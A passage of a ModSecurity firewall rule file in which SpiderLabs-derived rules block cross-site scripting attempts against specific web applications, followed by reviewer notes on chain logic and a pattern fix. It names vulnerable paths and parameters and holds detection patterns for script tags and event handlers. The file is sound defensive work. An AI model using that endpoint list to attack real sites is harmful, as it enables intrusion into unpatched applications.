n6plugindestructor.asp Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004584) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DGNews XSS Attempt -- footer.php copyright SecRule REQUEST_LINE "@contains /footer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004584,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DGNews XSS Attempt -- footer.php copyright',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24200'" SecRule &TX:'/XSS.*ARGS:copyright/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DGNews XSS Attempt -- footer.php copyright',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004585) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DGNews XSS Attempt -- news.php catid SecRule REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004585,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DGNews XSS Attempt -- news.php catid',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24201'" SecRule &TX:'/XSS.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DGNews XSS Attempt -- news.php catid',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003920) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DVDdb XSS Attempt -- loan.php movieid SecRule REQUEST_LINE "@contains /loan.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003920,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DVDdb XSS Attempt -- loan.php 
movieid',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23764'" SecRule &TX:'/XSS.*ARGS:movieid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DVDdb XSS Attempt -- loan.php movieid',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003921) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DVDdb XSS Attempt -- listmovies.php s SecRule REQUEST_LINE "@contains /listmovies.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003921,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DVDdb XSS Attempt -- listmovies.php s',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23764'" SecRule &TX:'/XSS.*ARGS:s/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DVDdb XSS Attempt -- listmovies.php s',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004595) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Digirez XSS Attempt -- info_book.asp Room_name SecRule REQUEST_LINE "@contains /room/info_book.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004595,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Digirez XSS Attempt -- info_book.asp Room_name',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469589/100/0/threaded'" SecRule &TX:'/XSS.*ARGS:Room_name/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Digirez XSS Attempt -- info_book.asp Room_name',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004596) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Digirez XSS Attempt -- week.asp curYear SecRule REQUEST_LINE "@contains /room/week.asp" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004596,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Digirez XSS Attempt -- week.asp curYear',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469589/100/0/threaded'" SecRule &TX:'/XSS.*ARGS:curYear/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Digirez XSS Attempt -- week.asp curYear',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004593) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dokeos XSS Attempt -- editor.php img SecRule REQUEST_LINE "@contains /main/inc/lib/fckeditor/editor/plugins/ImageManager/editor.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004593,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Dokeos XSS Attempt -- editor.php img',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3974'" SecRule &TX:'/XSS.*ARGS:img/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dokeos XSS Attempt -- editor.php img',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003876) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EQdkp XSS Attempt -- listmembers.php show SecRule REQUEST_LINE "@contains /listmembers.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003876,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS EQdkp XSS Attempt -- listmembers.php show',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23951'" SecRule &TX:'/XSS.*ARGS:show/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EQdkp XSS Attempt -- listmembers.php 
show',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2003877) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EQdkp XSS Attempt -- stats.php show SecRule REQUEST_LINE "@contains /stats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003877,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS EQdkp XSS Attempt -- stats.php show',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23951'" SecRule &TX:'/XSS.*ARGS:show/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EQdkp XSS Attempt -- stats.php show',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011153) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ektron CMS400.NET reterror.aspx info Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /WorkArea/reterror.aspx" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011153,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Ektron CMS400.NET reterror.aspx info Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,39679'" SecRule &TX:'/XSS.*ARGS:info/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ektron CMS400.NET reterror.aspx info Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011154) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ektron CMS400.NET medialist.aspx selectids Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /workarea/medialist.aspx" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011154,rev:2,msg:'SLR: ET 
WEB_SPECIFIC_APPS Ektron CMS400.NET medialist.aspx selectids Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,39679'" SecRule &TX:'/XSS.*ARGS:selectids/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ektron CMS400.NET medialist.aspx selectids Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011256) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FireStats window-add-excluded-ip.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/firestats/php/window-add-excluded-ip.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011256,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FireStats window-add-excluded-ip.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:edit/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FireStats window-add-excluded-ip.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011257) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FireStats window-add-excluded-url.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/firestats/php/window-add-excluded-url.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011257,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FireStats window-add-excluded-url.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:edit/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FireStats window-add-excluded-url.php Cross Site Scripting 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2011258) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FireStats window-new-edit-site.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/firestats/php/window-new-edit-site.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011258,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FireStats window-new-edit-site.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:site_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FireStats window-new-edit-site.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004586) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GMTT Music Distro XSS Attempt -- showown.php st SecRule REQUEST_LINE "@contains /showown.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004586,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS GMTT Music Distro XSS Attempt -- showown.php st',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469269/100/0/threaded'" SecRule &TX:'/XSS.*ARGS:st/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GMTT Music Distro XSS Attempt -- showown.php st',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004563) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_cat_detail SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004563,rev:6,msg:'SLR: ET 
WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_cat_detail',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24066'" SecRule &TX:'/XSS.*ARGS:galix_cat_detail/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_cat_detail',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004564) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_gal_detail SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004564,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_gal_detail',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24066'" SecRule &TX:'/XSS.*ARGS:galix_gal_detail/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_gal_detail',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004565) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_cat_detail_sort SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004565,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_cat_detail_sort',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24066'" SecRule &TX:'/XSS.*ARGS:galix_cat_detail_sort/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GaliX XSS Attempt -- index.php galix_cat_detail_sort',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004562) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 
Gnatsweb and Gnats XSS Attempt -- gnatsweb.pl database SecRule REQUEST_LINE "@contains /gnatsweb.pl" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004562,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Gnatsweb and Gnats XSS Attempt -- gnatsweb.pl database',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25333'" SecRule &TX:'/XSS.*ARGS:database/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Gnatsweb and Gnats XSS Attempt -- gnatsweb.pl database',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004554) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php authusername SecRule REQUEST_LINE "@contains /hlstats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004554,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php authusername',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24102'" SecRule &TX:'/XSS.*ARGS:authusername/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php authusername',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004555) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php authpassword SecRule REQUEST_LINE "@contains /hlstats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004555,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php authpassword',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24102'" SecRule &TX:'/XSS.*ARGS:authpassword/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HLstats XSS 
Attempt -- hlstats.php authpassword',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004560) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php SecRule REQUEST_LINE "@contains /hlstats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004560,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24063'" SecRule REQUEST_LINE "@contains | 3C |" "chain" SecRule REQUEST_LINE "@contains SCRIPT" "chain" SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2004561) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php action SecRule REQUEST_LINE "@contains /hlstats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004561,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php action',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24063'" SecRule &TX:'/XSS.*ARGS:action/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HLstats XSS Attempt -- hlstats.php action',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010770) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HP System Management Homepage Input Validation Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /smhui/getuiinfo" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010770,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS HP System Management Homepage Input Validation Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2009-4185'" SecRule REQUEST_LINE "@contains JS" "chain" SecRule &TX:'/XSS.*ARGS:servercert/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HP System Management Homepage Input Validation Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2009647) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Hubscript XSS Attempt SecRule REQUEST_LINE "@contains /patch/single_winner1.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009647,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Hubscript XSS Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.com/0907-exploits/hubscript-xssphpinfo.txt'" SecRule ARGS_NAMES "(?i:bid_id)" "chain" SecRule REQUEST_LINE "@contains <script>" "chain" SecRule REQUEST_LINE "@contains </script>" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Hubscript XSS Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010145) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible IBM Rational RequisitePro ReqWebHelp Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /ReqWebHelp/advanced/workingSet.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010145,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible IBM Rational RequisitePro ReqWebHelp Cross Site Scripting Attempt',tag:'web-application-attack',tag:'url,www-01.ibm.com/support/docview.wss?uid=swg1PK83895'" 
SecRule REQUEST_LINE "@contains operation=add" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:(script|img|src|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible IBM Rational RequisitePro ReqWebHelp Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010181) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp searchWord Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /ReqWebHelp/basic/searchView.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010181,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp searchWord Cross Site Scripting Attempt',tag:'web-application-attack',tag:'url,www-01.ibm.com/support/docview.wss?uid=swg1PK83895'" SecRule &TX:'/XSS.*ARGS:searchWord/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp searchWord Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010182) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp maxHits Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /ReqWebHelp/basic/searchView.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010182,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp maxHits Cross Site Scripting Attempt',tag:'web-application-attack',tag:'url,www-01.ibm.com/support/docview.wss?uid=swg1PK83895'" SecRule &TX:'/XSS.*ARGS:maxHits/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp maxHits Cross Site 
Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010183) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp scopedSearch Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /ReqWebHelp/basic/searchView.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010183,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp scopedSearch Cross Site Scripting Attempt',tag:'web-application-attack',tag:'url,www-01.ibm.com/support/docview.wss?uid=swg1PK83895'" SecRule &TX:'/XSS.*ARGS:scopedSearch/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp scopedSearch Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010184) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp scope Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /ReqWebHelp/basic/searchView.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010184,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp scope Cross Site Scripting Attempt',tag:'web-application-attack',tag:'url,www-01.ibm.com/support/docview.wss?uid=swg1PK83895'" SecRule &TX:'/XSS.*ARGS:scope/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IBM Rational RequisitePro ReqWebHelp scope Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2010865) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IBM Possible Lotus Domino readme.nsf Cross Site Scripting Attempt 
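# ---------------------------------------------------------------------------
# Review notes for rule ids 2010865 .. 2004579 (application-specific XSS).
#
# Every detection here is a chain. The starter matches a path fragment in
# REQUEST_LINE and carries the metadata (phase, block, id, rev, msg, tag,
# severity). The last link adds tx.critical_anomaly_score to tx.anomaly_score,
# sets tx.msg and stores the match as tx.<rule.id>-WEB_ATTACK/XSS-<var name>.
#
# Links written as  &TX:'/XSS.*ARGS:<param>/' "@gt 0"  count TX variables whose
# name matches the regex, so they only fire after some earlier rule has stored
# an XSS hit for that parameter under the naming scheme above.
# NOTE(review): presumably the generic XSS rules provide those variables;
# confirm they are enabled and evaluated before this file, otherwise these
# chains stay silent.
# NOTE(review): the regex has no end anchor, so ARGS:slot also counts a hit on
# a longer parameter name that merely starts with "slot"; anchor it if exact
# names matter.
# NOTE(review): @contains is case-sensitive and the starters apply no
# t:lowercase, so a path sent in different letter case is not matched. On
# case-insensitive platforms (e.g. the .aspx target below) consider adding
# t:lowercase together with a lower-case pattern.
#
# Fixed in this block (ids 2004576-2004579): the chained tests read
# "@contains | 3C |" and "@contains | 3E |", which looks like Snort hex-content
# notation carried over verbatim. @contains compares literal text, so those
# links could only match a request line containing the string "| 3C |" itself,
# never an angle bracket, and "SCRIPT" was matched in upper case only. The
# links now test for "<", "script" (after t:lowercase) and ">", and each link
# lists its own transformations so the decoded request line is what is tested.
# NOTE(review): assumes chained links do not inherit the starter's t: list;
# listing the transformations explicitly is harmless either way.
# This turns previously inert rules into live ones: observe them in
# detection-only mode and tune before enforcing.
# Rules 2004560, 2004580 and 2004592 elsewhere in this file use the same
# "| 3C |" pattern and are not changed by this edit.
# ---------------------------------------------------------------------------
SecRule REQUEST_LINE "@contains /help/readme.nsf/Header" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010865,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS IBM Possible Lotus Domino readme.nsf Cross Site Scripting Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/38481'"
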